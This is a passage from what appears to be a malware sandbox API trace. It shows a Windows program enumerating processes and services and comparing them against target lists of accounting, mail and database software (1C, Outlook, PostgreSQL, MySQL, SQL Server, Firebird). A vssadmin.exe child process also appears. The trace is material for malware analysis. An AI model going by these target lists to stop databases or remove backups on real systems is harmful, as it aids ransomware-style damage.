[0056.341] lstrlenW (lpString="csrss.exe") returned 9 [0056.341] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0056.341] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0056.341] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0056.341] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0056.341] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0056.341] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0056.341] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0056.341] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0056.342] lstrlenW (lpString="wininit.exe") returned 11 [0056.342] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0056.342] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0056.342] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0056.342] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.343] lstrlenW (lpString="csrss.exe") returned 9 [0056.343] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0056.343] lstrlenW (lpString="winlogon.exe") returned 12 [0056.343] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0056.344] lstrlenW (lpString="services.exe") returned 12 [0056.344] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0056.345] lstrlenW (lpString="lsass.exe") returned 9 [0056.345] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0056.346] lstrlenW (lpString="lsm.exe") returned 7 [0056.346] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.346] lstrlenW (lpString="svchost.exe") returned 11 [0056.347] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.347] lstrlenW (lpString="svchost.exe") returned 11 [0056.347] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.348] lstrlenW (lpString="svchost.exe") returned 11 [0056.348] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.349] lstrlenW (lpString="svchost.exe") returned 11 [0056.349] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x37, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.349] lstrlenW (lpString="svchost.exe") returned 11 [0056.349] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0056.350] lstrlenW (lpString="audiodg.exe") returned 11 [0056.350] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.351] lstrlenW (lpString="svchost.exe") returned 11 [0056.351] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.351] lstrlenW (lpString="svchost.exe") returned 11 [0056.352] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0056.352] lstrlenW (lpString="dwm.exe") returned 7 [0056.352] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0056.353] lstrlenW (lpString="explorer.exe") returned 12 [0056.353] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0056.354] lstrlenW (lpString="spoolsv.exe") returned 11 [0056.354] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0056.354] lstrlenW (lpString="taskhost.exe") returned 12 [0056.354] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.355] lstrlenW (lpString="svchost.exe") returned 11 [0056.355] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0056.356] lstrlenW (lpString="taskeng.exe") returned 11 [0056.356] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0056.356] lstrlenW (lpString="taskhost.exe") returned 12 [0056.357] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0056.357] lstrlenW (lpString="entrepreneur.exe") returned 16 [0056.357] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0056.358] lstrlenW (lpString="andrew kinds.exe") returned 16 [0056.358] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0056.359] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0056.359] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0056.359] lstrlenW (lpString="educated.exe") returned 12 [0056.359] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0056.360] lstrlenW (lpString="servers.exe") returned 11 [0056.360] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0056.361] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0056.361] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0056.535] lstrlenW (lpString="gbp_chair.exe") returned 13 [0056.535] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0056.536] lstrlenW (lpString="attention infected.exe") returned 22 [0056.536] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0056.537] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0056.537] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0056.537] lstrlenW (lpString="pattern amateur.exe") returned 19 [0056.537] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0056.538] lstrlenW (lpString="referral.exe") returned 12 [0056.538] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0056.539] lstrlenW (lpString="copyingseems.exe") returned 16 [0056.539] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0056.540] lstrlenW (lpString="spin generally.exe") returned 18 [0056.540] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0056.540] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0056.540] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0056.541] lstrlenW (lpString="transmit.exe") returned 12 [0056.541] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0056.542] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0056.542] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0056.542] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0056.542] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0056.543] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0056.543] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0056.544] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0056.544] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0056.545] lstrlenW (lpString="delight.exe") returned 11 [0056.545] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0056.545] lstrlenW (lpString="within enquiry.exe") returned 18 [0056.545] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.546] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0056.546] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0056.547] lstrlenW (lpString="agent1c.exe") returned 11 [0056.547] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.547] lstrlenW (lpString="cmd.exe") returned 7 [0056.547] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.548] lstrlenW (lpString="conhost.exe") returned 11 [0056.548] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0056.549] lstrlenW (lpString="vssadmin.exe") returned 12 [0056.549] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0056.550] lstrlenW (lpString="VSSVC.exe") returned 9 [0056.550] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.550] lstrlenW (lpString="svchost.exe") returned 11 [0056.550] Process32NextW (in: hSnapshot=0x240, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0056.551] CloseHandle (hObject=0x240) returned 1 [0056.551] Sleep (dwMilliseconds=0x1f4) [0057.378] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3720380 [0057.379] EnumServicesStatusExW (in: hSCManager=0x3720380, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0057.379] GetLastError () returned 0xea [0057.379] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x6e39b0 [0057.380] EnumServicesStatusExW (in: hSCManager=0x3720380, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6e39b0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6e39b0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0057.380] CloseServiceHandle (hSCObject=0x3720380) returned 1 [0057.380] lstrlenW (lpString="Appinfo") returned 7 [0057.380] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0057.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0057.381] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0057.381] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0057.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0057.381] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0057.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0057.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0057.381] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0057.381] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0057.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0057.381] lstrlenW (lpString="AudioSrv") returned 8 [0057.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0057.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0057.381] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0057.381] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0057.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0057.381] lstrlenW (lpString="BFE") returned 3 [0057.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0057.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0057.381] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0057.381] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0057.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0057.381] lstrlenW (lpString="CryptSvc") returned 8 [0057.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0057.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0057.381] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0057.381] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0057.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0057.381] lstrlenW (lpString="CscService") returned 10 [0057.381] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0057.381] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0057.381] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0057.381] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0057.381] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0057.382] lstrlenW (lpString="DcomLaunch") returned 10 [0057.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0057.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0057.382] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0057.382] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0057.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0057.382] lstrlenW (lpString="Dhcp") returned 4 [0057.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0057.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0057.382] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0057.382] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0057.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0057.382] lstrlenW (lpString="Dnscache") returned 8 [0057.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0057.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0057.382] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0057.382] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0057.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0057.382] lstrlenW (lpString="DPS") returned 3 [0057.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0057.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0057.382] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0057.382] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0057.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0057.382] lstrlenW (lpString="eventlog") returned 8 [0057.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0057.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0057.382] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0057.382] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0057.382] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0057.382] lstrlenW (lpString="EventSystem") returned 11 [0057.382] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0057.382] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0057.382] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0057.383] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0057.383] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0057.383] lstrlenW (lpString="gpsvc") returned 5 [0057.383] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0057.383] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0057.383] lstrcmpiW 